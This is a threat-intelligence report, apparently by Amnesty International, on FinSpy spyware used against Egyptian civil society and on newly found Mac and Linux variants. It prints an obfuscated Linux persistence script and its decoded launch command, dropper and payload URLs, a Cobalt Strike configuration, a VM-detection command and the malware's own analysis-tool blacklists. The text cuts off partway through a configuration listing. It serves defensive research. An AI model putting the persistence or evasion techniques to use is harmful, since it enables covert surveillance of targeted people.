{
	"id": "c085501f-0637-45cf-8f67-40a9fa4bad63",
	"created_at": "2026-04-06T00:20:07.536841Z",
	"updated_at": "2026-04-10T13:11:28.398215Z",
	"deleted_at": null,
	"sha1_hash": "08f28a1c3c042b3806e0e32fe993bdc915da55b9",
	"title": "German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 514370,
	"plain_text": "German-made FinSpy spyware found in Egypt, and Mac and Linux\r\nversions revealed\r\nPublished: 2020-09-25 · Archived: 2026-04-05 13:13:12 UTC\r\nSummary:\r\nFinSpy is a commercial spyware suite produced by the Munich-based company FinFisher Gmbh. Since 2011\r\nresearchers have documented numerous cases of targeting of Human Rights Defenders (HRDs) – including activists,\r\njournalists, and dissidents with the use of FinSpy in many countries, including Bahrain, Ethiopia, UAE, and more.\r\nBecause of this, Amnesty International’s Security Lab tracks FinSpy usage and development as part of our\r\ncontinuous monitoring of digital threats to Human Rights Defenders.\r\nAmnesty International published a report in March 2019 describing phishing attacks targeting Egyptian human rights\r\ndefenders and media and civil society organizations staff carried out by an attacker group known as “NilePhish”.\r\nWhile continuing research into this group’s activity, we discovered it has distributed samples of FinSpy for Microsoft\r\nWindows through a fake Adobe Flash Player download website. Amnesty International has not documented human\r\nrights violations by NilePhish directly linked to FinFisher products.\r\nThrough additional technical investigations into this most recent variant, Amnesty’s Security Lab also discovered,\r\nexposed online by an unknown actor, new samples of FinSpy for Windows, Android, and previously undisclosed\r\nversions for Linux and MacOS computers.\r\nThis report provides technical information on these recent FinSpy samples in order to aid the cybersecurity research\r\ncommunity in further investigations, enable cybersecurity vendors implement protection mechanisms against these\r\nnewly discovered variants, and to raise awareness among HRDs of evolving digital attack techniques.\r\nIntroduction\r\nFinSpy is a full-fledged surveillance software suite, capable of intercepting communications, accessing private data, and\r\nrecording audio and video, from the computer or mobile devices it is silently installed on. FinSpy is produced by Munich-based company FinFisher Gmbh and sold to law enforcement and government agencies around the world. According to\r\nmedia reports, when Egyptian protesters broke into the offices of the now dissolved State Security Investigations Service, an\r\nintelligence body responsible for investigating security threats and notorious for committing grave human rights violations\r\nduring Hosni Mubarak’s decades’ long rule, in 2011, they discovered contracts for the sale of FinSpy to Egyptian authorities.\r\nSince then, research groups such as Citizen Lab, at the University of Toronto, and Privacy International have discovered\r\nFinSpy being used to target HRDs and civil society in many countries, including Bahrain, Turkey and Ethiopia. Because of\r\nthis, Amnesty International’s Security Lab tracks FinSpy usage and development as part of our continuous monitoring of\r\ndigital threats to HRDs.\r\nIn September 2019, Amnesty International discovered samples of FinFisher’s spyware distributed by malicious\r\ninfrastructure tied to the attacker group commonly known as NilePhish. likely to be state sponsored. These attacks took\r\nplace amid an unprecedented crackdown on independent civil society and any critical voices. Over the years, numerous\r\nresearch reports, including by Amnesty International, detailed NilePhish’s campaigns of targeting of Egyptian civil society\r\norganizations. Further technical investigation by Amnesty’s Security Lab led to the discovery of additional previously\r\nunknown samples for Linux and Mac OS computers, provided with extensive interception capabilities.\r\nWith this report, Amnesty’s Security Lab shares new insights into the capabilities of the NilePhish attacker group, as well as\r\nprovides detailed analysis of newly discovered variants of FinSpy in order to enable cybersecurity researchers to further\r\ninvestigate and develop protection mechanisms. In addition, we hope to raise awareness among HRDs on the evolution of\r\ndigital attack techniques and help address common misconceptions that Linux and Mac computers are safer against spyware\r\nattacks.\r\nNilePhish Fake Flash Player Update deliver FinFisher’s FinSpy\r\nIn March 2019 Amnesty International’s Security Lab warned Egyptian civil society organizations of a widespread campaign\r\nof phishing attacks targeting human rights defenders, conducted by the so-called NilePhish attacker group. Following the\r\npublication, we continued monitoring the malicious infrastructure operated by this group to identify any new attack\r\ncampaigns.\r\nBy monitoring the group’s tools, techniques and attack infrastructure, in September 2019, Amnesty’s Security Lab identified\r\nthe malicious website flash.browserupdate[.]download connected to NilePhish. The website pretended to be a warning by\r\nAdobe Flash Player recommending installing an update. Clicking anywhere on the page would download a recent version of\r\nFlash Player backdoored with FinSpy.\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 1 of 17\n\nflash.browserupdate[.]download as displayed in September 2019\r\nWhen we analyzed this Flash Player installer, we found it to be a FinSpy dropper (with hash\r\nf960144126748b971386731d35e41288336ad72a9da0c6b942287f397d57c600), designed to retrieve the final payload from\r\nthe server https://172.241.27[.]171/support/personal.asp. This payload would then be loaded into memory and executed.\r\nThe server was offline at the time of analysis and we therefore did not manage to retrieve any additional payload.\r\nThe version of Flash Player (32.0.0.269) used to bundle the FinSpy downloader was released by Adobe in September 2019.\r\nThe file had a creation date of 20th September 2019. This suggests that backdoored binary was newly created around the\r\ntime period in September 2019 when it was first uploaded to browserupdate[.]download.\r\nIt is worth noting that in 2017, ESET, a Slovak internet security company reported that FinFisher spyware was being\r\ndelivered using network injection attacks in two (unnamed) countries. The research group Citizen Lab, located at the\r\nUniversity of Toronto, later discovered evidence of equipment used for similar network injection attacks in Egypt,\r\nsuggesting it might have also been used for the distribution of FinFisher’s FinSpy. We cannot exclude that targets of this\r\ncampaign were redirected to the browserupdate[.]download page through network injection, as similar backdoored software\r\nhave been used in network injection attacks in the past.\r\nConnections with NilePhish\r\nThe operators of this fake Flash Player download page created several other droppers which would download payloads from\r\nbrowserupdate[.]com. These included malicious Word documents containing macros, and a .NET program named\r\nclean.downloader.exe (with hash 14658327efaa15275fb8718956ee97ebcad5bc80312a4f3182a3b10cd3dcf257), uploaded to\r\nthe malware scanning service VirusTotal on 8th October 2019. These additional droppers appeared to be under development\r\nand used for testing purposes: each downloaded a legitimate version of the tool Putty from\r\nhttps://flash.browserupdate[.]download/putty.exe.\r\nRevealingly, the .NET dropper included a PDB debug path from the developer’s computer:\r\nC:\\Users\\shenno\\source\\repos\\clean.downloader\\clean.downloader\\obj\\Release\\clean.downloader.pdb.\r\nThe username on the computer where this dropper was developed is “shenno”. This name we had previously found used by\r\nattackers behind the NilePhish campaign we detailed in our March 2019 report. The Security Lab continued to monitor this\r\ngroup’s campaigns following our publication.\r\nIn February 2020, approximately 6 months after the initial FinSpy discovery, a new subdomain\r\n“files.browserupdate[.]download” was created which acted as reverse-proxy to a Cobalt Strike server hosted at\r\n185.125.230.203 (more on this later). This IP is registered to a small Russian hosting company named Offshore Servers.\r\nSince 2018 we have observed NilePhish hosting a large part of their phishing infrastructure with Offshore Servers.\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 2 of 17\n\nLink between the FinSpy sample and NilePhish\r\nIn October 2019, cybersecurity firm CheckPoint released a follow-up report based on Amnesty International’s research\r\nwhich independently confirmed links between NilePhish, the Offshore Servers infrastructure and the operator named\r\n“shenno”. CheckPoint identified an Egyptian individual who they linked to NilePhish and the “shenno” username and first\r\nrevealed it to the public. At the time of our discovery of the fake Flash Player FinSpy dropper, “shenno” had not been\r\ndisclosed yet.\r\nThe combination of nickname reuse, the use of the same hosting provider Offshore Servers, and the registration of additional\r\nNilePhish domains with the same registrar in September 2019 ties this activity to NilePhish. These additional NilePhish\r\ndomains include loglive.co (registered September 11th), webmaillive.co (registered September 15th), and onlineaccount.live\r\n(registered October 2nd, 2019). Amnesty International has not confirmed how NilePhish obtained FinSpy software.\r\nNilePhish testing Cobalt Strike\r\nIn February 2020, a new subdomain files.browserupdate[.]download was created pointing to server at 5.135.174[.]213,\r\nserviced by French hosting company OVH. This server was hosting an HTTP server with a valid TLS certificate on port\r\n443. Using Censys we found that the server hosted on Offshore Servers at 185.125.230[.]203 was also running a web server\r\nwith the same TLS cert. Timing measurements showed that the OVH server was a reverse proxy for 185.125.230[.]203.\r\nProbing any URL which matched the URI checksum algorithm used by Cobalt Strike and Metasploit, would indeed serve\r\nCobalt Strike payloads.\r\nCobalt Strike is a commercial penetration testing suite, that is sold for legitimate security audits of organizations. Since\r\n2016, Cobalt Strike has been identified as being abused by many attack groups such as the cyber-criminal Cobalt Group, and\r\nstate-sponsored groups targeting governments and individuals in Hong Kong and India. Cobalt Strike samples have been\r\nlargely analysed publicly by several cyber-security companies.\r\nAn obfuscated VBS script located at https://files.browserupdate[.]download/a downloads a Cobalt Strike payload from the\r\nsame server on port 443 and launches it.\r\nHere is the extracted configuration of the Cobalt Strike sample:\r\ndns : False\r\nssl : True\r\nport : 443\r\n.sleeptime : 5000\r\n.http-get.server.output :\r\n.jitter : 0\r\n.maxdns : 255\r\npublickey :\r\n30819f300d06092a864886f70d010101050003818d0030818902818100f2b83af090d1a0c0a59e62ede880813384eccb6bff849d03d201a92f653a0747aa832a\r\n.http-get.uri : files.browserupdate.download,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\r\n.user-agent : Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n.http-post.uri : /N4215/adj/amzn.us.sr.aps\r\n.http-get.client : Accept: /\r\nHost: www.amazon.comsession-token=\r\n                                  skin=noskin;,csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996Cookie\r\n.http-post.client :  Accept: /\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 3 of 17\n\nContent-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\nHost: www.amazon.com   \r\nsz=160×600    oe=oe=ISO-8859-1;sn    s=3717    “dc_ref=http%3A%2F%2Fwww.amazon.com\r\n.spawnto : fbf34aa48d6080bf8ef3eaff8ecf9a31\r\n.post-ex.spawnto_x86 : %windir%\\syswow64\\rundll32.exe\r\n.post-ex.spawnto_x64 : %windir%\\sysnative\\rundll32.exe\r\nunknown :\r\ncryptoscheme : 0\r\n.dns_idle : 0\r\n.dns_sleep  : 0\r\n.http-get.verb : GET\r\n.http-post.verb : POST\r\nshouldChunkPosts : 0\r\nwatermark : 1\r\n.stage.cleanup : 0\r\nCFGCaution : 0\r\nWe provide signatures to detect Cobalt Strike and scripts to decode the payload and extract its configuration in our Github\r\nrepository.\r\nFinSpy for Linux and Mac OS discovered\r\nIn the fall of 2019, while investigating recent versions of FinSpy following the discovery of its use by NilePhish, we\r\nidentified additional FinSpy samples through the malware research platform VirusTotal hosted at a server located at the IP\r\naddress 158.69.105[.]207. We believe this server has no relation to NilePhish and belongs to a different FinSpy operator.\r\nScreenshot of the server webpage in October 2019\r\nThis server hosted several samples linked from a publicly exposed webpage:\r\n“Jabuka.app”: FinSpy for Mac OS, publicly disclosed here for the first time.\r\n“PDF”: FinSpy for Linux, publicly disclosed here for the first time.\r\n“wrar571.exe”: FinSpy downloader for Windows.\r\n“WIFI.apk”: FinSpy for Android.\r\nAll these FinSpy samples were generated between April 2019 and November 2019.\r\nFinSpy for Mac OS\r\nThe application bundle “Jakuba.app” is a copy of FinSpy for Mac OS, and it contains the following files:\r\nJabuka.app/Contents/Resources/data (with hash\r\n37e749b79f4a24ead2868dffdb22c5034053615fed1166fdea05b4ca43b65c83) is an encrypted payload. \r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 4 of 17\n\nJabuka.app/Contents/Info.plist (with hash\r\nb5304d70dfe832c5a830762f8abc5bc9c4c6431f8ecfe80a6ae37b9d4cb430fd) is a PList used for persistence.\r\nJabuka.app/Contents/MacOS/installer (with hash\r\n80d6e71c54fb3d4a904637e4d56e108a8255036cbb4760493b142889e47b951f) is the launcher.\r\nInfection Chain\r\nThe FinSpy sample for MacOS uses a quite complex chain to infect the system, and the developers took measures to\r\ncomplicate its analysis. All the binaries are obfuscated with the open source LLVM-obfuscator developed by a research team\r\nin 2013.\r\nThe first stage is doing some checks to detect if the spyware is running in a Virtual Machine:\r\n\u003e system_profiler SPUSBDataType | egrep -i “Manufacturer: (parallels|vmware|virtualbox)”\r\nIf it is not, it then decrypts, by XOR’ing with the string “NSString”, a Zip archive at the path /tmp/arch.zip and unpacks it to\r\n/tmp/org.logind.ctp.archive. This archive contains the installer, the main cyload, but also binaries for privilege escalation:\r\nhelper: exploits a bug in Mac OS X  fixed in 2013 or 2014.\r\nhelper2: Python exploit for CVE-2015-5889.\r\nThis first stage uses the exploits to get root access. If none of them work, it will ask the user to grant root permissions to\r\nlaunch the next stage installer.\r\nThe installer (/tmp/org.logind.ctp.archive/installer) oversees installing the spyware in the system by:\r\n1. Copying all the plugins and configuration files to /Library/Frameworks/Storage.framework.\r\n2. Copying the launcher to /private/etc/logind.\r\n3. Installing persistence by creating a logind.pslist file in /System/Library/LaunchAgents/ (T1543.001).\r\nA modular framework\r\nFinSpy for Mac OS, and similarly its Linux counterpart, follow a modular design. The launcher logind only instantiates the\r\ncore component dataPkg, which oversees communications with the Command and Control server (C\u0026C), and\r\ndecrypting/launching modules when needed. The modules are encrypted with the AES algorithm and compressed with the\r\naplib compression library. The AES key is stored in the binary, but the IV is stored in each configuration file along with a\r\nMD5 hash of the final decompressed file.\r\nHere is the list of modules available in this version of the spyware, although additional references in the code suggest\r\nadditional modules might exist but were not available in this distribution:\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 5 of 17\n\nFile\r\nname Module Name Description\r\n02 FSMain List files.\r\n04 CL Executes shell commands.\r\n05 Sch Scheduling.\r\n10 A Audio recording.\r\n12 IO Keylogger.\r\n16 FSCF\r\nRecording of modified files using File System\r\nEvents API.\r\n17 FSAF Recording of accessed files.\r\n19 FSDF Recording of deleted files.\r\n22 MCMain Keylogger for virtual keyboards.\r\n23 CW, LSC, RSC Camera recording\r\n24 SM Screen recording.\r\n28 W Collect information about Wi-Fi networks.\r\n29 RM List files on remote devices.\r\n7f\r\nHandles cryptography for C\u0026C\r\ncommunications.\r\nCommand \u0026 Control Communications\r\nCommand \u0026 Control Communications\r\nThe spyware communicates with the Command \u0026 Control (C\u0026C) server using HTTP POST requests. The data sent to the\r\nserver is encrypted using functions provided by the 7F module, compressed using a custom compressor and base64 encoded.\r\nAll requests are made with a Content-Type chosen randomly from following list:\r\napplication/pdf\r\napplication/zip\r\napplication/gzip\r\nimage/gif\r\nimage/jpeg\r\nimage/png\r\nimage/tiff\r\ntext/html\r\ntext/plain\r\nConfiguration\r\nEach module is provided with its own configuration file. These files are encoded using a Type Length Value format in a\r\ndifferent order (Size, Type, Value). The type serves both as an identifier and a field type, the lowest nibble representing the\r\ntype of data. Most types identified fit the TLVs listed in the FinSpy Android analysis published by the Chaos Computer Club\r\nin 2019.\r\nHere is the extracted configuration of the core module:\r\n{\r\n  “TlvTypeTrojanID”: “Jabuka”,\r\n  “0x80ab40”: 0,\r\n  “0x80aa40”: 0,\r\n  “TlvTypeEncryption”: “GZP\u0026OYq0S[AJ\\D\\u000e\\*^\\”L@}C”,\r\n  “TlvTypeConfigTargetID”: “Jabuka”,\r\n  “TlvTypeConfigAutoRemovalIfNoProxy”: 168,\r\n  “TlvTypeBlackWhiteListingMode”: 0,\r\n  “TlvTypeTrojanMaxInfections”: 9,\r\n  “TlvTypeTargetUID”: 0,\r\n  “TlvTypeBlackListEntry”: [\r\n    {\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 6 of 17\n\n“category”: “Monitoring”,\r\n      “list”: [\r\n        “taskmgr”,\r\n        “Windows Task Manager”,\r\n        “AccessEnum”,\r\n        “AccessEnum”,\r\n        “ADExplorer”,\r\n        “Active Directory Explorer”,\r\n        “ADInsight”,\r\n        “Insight for Active Directory”,\r\n        “Autologon”,\r\n        “Autologon”,\r\n        “autoruns”,\r\n        “Autoruns”,\r\n        “Bginfo”,\r\n        “BGInfo”,\r\n        “Cacheset”,\r\n        “Cacheset”,\r\n        “Dbgview”,\r\n        “Debug View”,\r\n        “Desktops”,\r\n        “Desktops”,\r\n        “disk2vhd”,\r\n        “Disk2vhd”,\r\n        “Diskmon”,\r\n        “Disk Monitor”,\r\n        “DiskView”,\r\n        “LoadOrd”,\r\n        “LoadOrder”,\r\n        “pagedfrg”,\r\n        “System File Defragmenter”,\r\n        “procexp”,\r\n        “Process Explorer”,\r\n        “Procmon”,\r\n        “Process Monitor”,\r\n        “RootkitRevealer”,\r\n        “ShareEnum”,\r\n        “ShellRunas”,\r\n        “Tcpview”,\r\n        “TCPView”,\r\n        “vmmap”,\r\n        “VMMap”,\r\n        “Winobj”,\r\n        “ZoomIt”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Sniffer”,\r\n      “list”: [\r\n        “wireshark”,\r\n        “The Wireshark Network Analyzer”,\r\n        “TCPDump”,\r\n        “Tcpview”,\r\n        “NetstatViewer”,\r\n        “Netstat Viewer”,\r\n        “NetPryer”,\r\n        “Ultra Network Sniffer”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Debugger”,\r\n      “list”: [\r\n        “OllyDbg”,\r\n        “idag”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 7 of 17\n\n“The interactive disassembler”,\r\n        “WinDbg”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeWhiteListEntry”: [\r\n    {\r\n      “category”: “Browser”,\r\n      “list”: [\r\n        “firefox”,\r\n        “Mozilla Firefox”,\r\n        “iexplore”,\r\n        “Windows Internet Explorer”,\r\n        “opera”,\r\n        “chrome”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Messenger”,\r\n      “list”: [\r\n        “icq”,\r\n        “ICQ”,\r\n        “aim6”,\r\n        “AIM”,\r\n        “Skype”,\r\n        “Ypager”,\r\n        “Yahoo Messenger”,\r\n        “pidgin”,\r\n        “Buddy List”,\r\n        “trillian”,\r\n        “Trillian”,\r\n        “googletalk”,\r\n        “google Talk”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “E – Mail”,\r\n      “list”: [\r\n        “OUTLOOK”,\r\n        “Microsoft Outlook”,\r\n        “msimn”,\r\n        “Outlook Express”,\r\n        “thunderbird”,\r\n        “Mozilla Thunderbird”,\r\n        “WinMail”,\r\n        “Windows Mail”,\r\n        “thebat”,\r\n        “The Bat!”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “FileSharing”,\r\n      “list”: [\r\n        “bittorrent”,\r\n        “Bit Torrent”,\r\n        “uTorrent”,\r\n        “µTorrent”,\r\n        “emule”,\r\n        “eMule”,\r\n        “edonkey2000”,\r\n        “eDonkey”,\r\n        “kazaa”,\r\n        “Kazaa”,\r\n        “FrostWire”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 8 of 17\n\n“LimeWire”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “VoIP”,\r\n      “list”: [\r\n        “CGStarter”,\r\n        “X-Lite”,\r\n        “Gizmo5”,\r\n        “Mercuro”,\r\n        “Mercuro IMS Client”,\r\n        “ts3client_win32”,\r\n        “TeamSpeak 3”,\r\n        “Zfone”,\r\n        “Zfone Control Panel”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeConfigTargetPort”: 443,\r\n  “TlvTypeRequestID”: 0,\r\n  “0x804140”: 2048,\r\n  “TlvTypeVersion”: 0,\r\n  “TlvTypeUserID”: 1000,\r\n  “TlvTypeConfigAutoRemovalDateTime”: “0000000000000000”,\r\n  “TlvTypeTrojanUID”: 232069579,\r\n  “TlvTypeConfigTargetProxy”: [\r\n    “185.25.50.[REDACTED]”,\r\n    “103.11.67.[REDACTED]”\r\n  ],\r\n  “TlvTypeConfigFileTransferSpeed”: 1024,\r\n  “0x807c30”: 0,\r\n  “TlvTypeConfigTargetHeartbeatInterval”: 60000,\r\n  “TlvTypeConfigActiveHiding”: 0\r\n}\r\nYou can find code to extract configuration from FinSpy samples on our Github repository.\r\nTimeline\r\nThe information from the PList file contains some metadata indicating that the development could have started on OS X\r\n10.9, which was released in October 2013. But the spyware was very likely packaged for use in November 2019 as most of\r\nthe files in the Zip archive were last modified in November 2019. Here is an extract of the archive information:\r\nDate Time Attr Size Compressed Name\r\n2019-11-20 12:48:29 D…. 0 0 org.logind.ctp.archive\r\n2019-11-20 12:48:29 ….A 30196 10420 org.logind.ctp.archive/helper\r\n2019-11-20 12:48:29 ….A 975 540 org.logind.ctp.archive/helper2\r\n2019-11-20 12:48:29 ….A 63164 21452 org.logind.ctp.archive/installer\r\n2019-11-20 12:48:29 ….A 34264 12137 org.logind.ctp.archive/logind\r\n2019-11-20 12:48:29 ….A 431 267 org.logind.ctp.archive/logind.plist\r\n2019-11-20 12:48:29 D…. 0 0 org.logind.ctp.archive/storage.framework\r\n2019-11-20 12:48:29 D…. 0 0 org.logind.ctp.archive/storage.framework/Contents\r\n2019-04-25 15:35:02 ….A 1286 477 org.logind.ctp.archive/storage.framework/Contents/Info.plist\r\n2019-04-25 15:35:02 ….A 8 8 org.logind.ctp.archive/storage.framework/Contents/PkgInfo\r\n2019-11-20 12:48:29 D…. 0 0 org.logind.ctp.archive/storage.framework/Contents/MacOS\r\n…\r\nRelated sample\r\nAn additional FinSpy Mac OS sample with name “caglayan-macos.dmg” was found on Virus Total:\r\n4f3003dd2ed8dcb68133f95c14e28b168bd0f52e5ae9842f528d3f7866495cea. This sample was created in February 2018\r\naccording to the zip files timestamp.\r\nFinSpy for Linux\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 9 of 17\n\nThe FinSpy Linux was exposed on the server 158.69.105[.]207 in November 2019 as a file named “PDF” with hash\r\n1e9162cd0941557304a6a097dfaadf59f90bc8bbaa9879afe67b5ce0d1514be8. The Linux payload is very similar to the Mac\r\nOS version described above, which suggests a potential shared codebase. However, the launchers and the infection chain are\r\nadapted to work on Linux systems.\r\nInfection Chain\r\nThe “PDF” file obtained from the server is a short script containing encoded binaries for Linux 32bit and 64bit. It extracts\r\nthe binary for the relevant architecture in /tmp/udev2 and executes it. Like its Mac OS counterpart, FinSpy for Linux is also\r\nobfuscated using LLVM-Obfuscator.\r\nThe udev2 installer then checks that the system is not a virtual machine, extracts files from itself and stores them in a hidden\r\nfolder in the user’s home, such as at ~/.cache/.cfg or ~/.local/.apps. Among the files extracted, are a first stage payload called\r\ncrond and encrypted modules named with a hexadecimal number (such as 02) with their configuration in .dat extension,\r\nsuch as 02C.dat. In order to maintain persistence, an obfuscated script is added to the following files:\r\n~/.profile\r\n~/.profile1\r\n~/.bash_profile\r\n~/.bash_profile1\r\n~/.kde/Autostart/udev2.sh\r\n~/.kde4/Autostart/udev2.sh\r\n~/.kde/Autostart\r\n~/.kde4/Autostart\r\nThe script is disguised as dealing with system fonts, but it executes FinSpy’s first stage:\r\nif [ ! -n “$CS_FONT” ]; then\r\n  # Load fonts by id\r\n  CS_FONT_RID=”2F686F6D652F757365722F2E63616368652F2E636667″\r\n  CS_FONT_ID=”2E2F63726F6E64″\r\n  CS_FONT_COL=”6364″\r\n  CS_FONT_COLF= echo ${CS_FONT_COL} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc\r\n2\u003e/dev/null|awk '{printf(\"%c\",$0)}'\r\n  CS_FONT_SID= echo ${CS_FONT_RID} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc\r\n2\u003e/dev/null|awk '{printf(\"%c\",$0)}'\r\n  CS_FONT_LOAD= echo ${CS_FONT_ID} |sed 's/../\u0026 /g' |sed 's/ / p /g' |awk '{print \"16i \"$0}'|dc\r\n2\u003e/dev/null|awk '{printf(\"%c\",$0)}'\r\n  if [ ! -n “$CS_FONT_COLF” ]; then\r\n     CS_FONT_COLF=$(for i in echo ${CS_FONT_COL} |sed 's/../\u0026 /g' ; do echo “000000 $i” | xxd -r; done)\r\n     CS_FONT_SID=$(for i in echo ${CS_FONT_RID} |sed 's/../\u0026 /g' ;  do echo “000000 $i” | xxd -r; done)\r\n     CS_FONT_LOAD=$(for i in echo ${CS_FONT_ID} |sed 's/../\u0026 /g' ;  do echo “000000 $i” | xxd -r; done)\r\n  fi\r\n  ${CS_FONT_COLF} ${CS_FONT_SID} \u0026\u0026 ${CS_FONT_LOAD} \u003e /dev/null 2\u003e\u00261 \u0026\u0026 ${CS_FONT_COLF} – \u003e\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 10 of 17\n\n/dev/null 2\u003e\u00261\r\n    unset CS_FONT_ID\r\n    unset CS_FONT_COLF\r\n    unset CS_FONT_SID\r\n    unset CS_FONT_LOAD\r\nfi\r\nBy converting the hexadecimal values embedded, the script eventually builds the following command and executes the\r\nFinSpy launcher:\r\ncd /home/user/.cache/.cfg \u0026\u0026 ./crond \u003e /dev/null 2\u003e\u00261 \u0026\u0026 cd – \u003e /dev/null 2\u003e\u00261\r\nThe installer finally launches the crond first stage binary copied in the installation folder. This crond binary only performs\r\nseveral checks (mutex in /tmp/.X11.lock, check if the process is debugged using ptrace), then decrypts and decodes the core\r\nmodule 80.so to run it in memory.\r\nModules\r\nThe modules available in the Linux sample are almost identical to the MacOS sample. The binaries are stored encrypted and\r\nobfuscated too, with a slightly different format, the AES Initialization vector being stored within the core module binary\r\ninstead of in the encrypted module files.\r\nThe modules available are exactly the list of modules in the MacOS sample with the addition of the module 14, which is\r\nresponsible to extract data and record conversations from Skype.\r\nConfiguration\r\nThe configuration of the different modules is stored in .dat files with the same encoding scheme as the MacOS sample. Here\r\nis the decoded configuration for the core module:\r\n{\r\n  “TlvTypeTrojanID”: “PDF”,\r\n  “0x80ab40”: 2774182400,\r\n  “0x80aa40”: 0,\r\n  “TlvTypeEncryption”: “B-P\u0026=YwCS[DJ\\3\\u000e)^^’@@\\b3”,\r\n  “TlvTypeConfigTargetID”: “PDF”,\r\n  “TlvTypeConfigAutoRemovalIfNoProxy”: 168,\r\n  “TlvTypeTrojanMaxInfections”: 9,\r\n  “TlvTypeTargetUID”: 0,\r\n  “TlvTypeBlackListEntry”: [\r\n    {\r\n      “category”: “Monitoring”,\r\n      “list”: [\r\n        “taskmgr”,\r\n        “Windows Task Manager”,\r\n        “AccessEnum”,\r\n        “AccessEnum”,\r\n        “ADExplorer”,\r\n        “Active Directory Explorer”,\r\n        “ADInsight”,\r\n        “Insight for Active Directory”,\r\n        “Autologon”,\r\n        “Autologon”,\r\n        “autoruns”,\r\n        “Autoruns”,\r\n        “Bginfo”,\r\n        “BGInfo”,\r\n        “Cacheset”,\r\n        “Cacheset”,\r\n        “Dbgview”,\r\n        “Debug View”,\r\n        “Desktops”,\r\n        “Desktops”,\r\n        “disk2vhd”,\r\n        “Disk2vhd”,\r\n        “Diskmon”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 11 of 17\n\n“Disk Monitor”,\r\n        “DiskView”,\r\n        “LoadOrd”,\r\n        “LoadOrder”,\r\n        “pagedfrg”,\r\n        “System File Defragmenter”,\r\n        “procexp”,\r\n        “Process Explorer”,\r\n        “Procmon”,\r\n        “Process Monitor”,\r\n        “RootkitRevealer”,\r\n        “ShareEnum”,\r\n        “ShellRunas”,\r\n        “Tcpview”,\r\n        “TCPView”,\r\n        “vmmap”,\r\n        “VMMap”,\r\n        “Winobj”,\r\n        “ZoomIt”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Sniffer”,\r\n      “list”: [\r\n        “wireshark”,\r\n        “The Wireshark Network Analyzer”,\r\n        “TCPDump”,\r\n        “Tcpview”,\r\n        “NetstatViewer”,\r\n        “Netstat Viewer”,\r\n        “NetPryer”,\r\n        “Ultra Network Sniffer”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Debugger”,\r\n      “list”: [\r\n        “OllyDbg”,\r\n        “idag”,\r\n        “The interactive disassembler”,\r\n        “WinDbg”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeWhiteListEntry”: [\r\n    {\r\n      “category”: “Browser”,\r\n      “list”: [\r\n        “firefox”,\r\n        “Mozilla Firefox”,\r\n        “iexplore”,\r\n        “Windows Internet Explorer”,\r\n        “opera”,\r\n        “chrome”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Messenger”,\r\n      “list”: [\r\n        “icq”,\r\n        “ICQ”,\r\n        “aim6”,\r\n        “AIM”,\r\n        “Skype”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 12 of 17\n\n“Ypager”,\r\n        “Yahoo Messenger”,\r\n        “pidgin”,\r\n        “Buddy List”,\r\n        “trillian”,\r\n        “Trillian”,\r\n        “googletalk”,\r\n        “google Talk”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “E – Mail”,\r\n      “list”: [\r\n        “OUTLOOK”,\r\n        “Microsoft Outlook”,\r\n        “msimn”,\r\n        “Outlook Express”,\r\n        “thunderbird”,\r\n        “Mozilla Thunderbird”,\r\n        “WinMail”,\r\n        “Windows Mail”,\r\n        “thebat”,\r\n        “The Bat!”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “FileSharing”,\r\n      “list”: [\r\n        “bittorrent”,\r\n        “Bit Torrent”,\r\n        “uTorrent”,\r\n        “µTorrent”,\r\n        “emule”,\r\n        “eMule”,\r\n        “edonkey2000”,\r\n        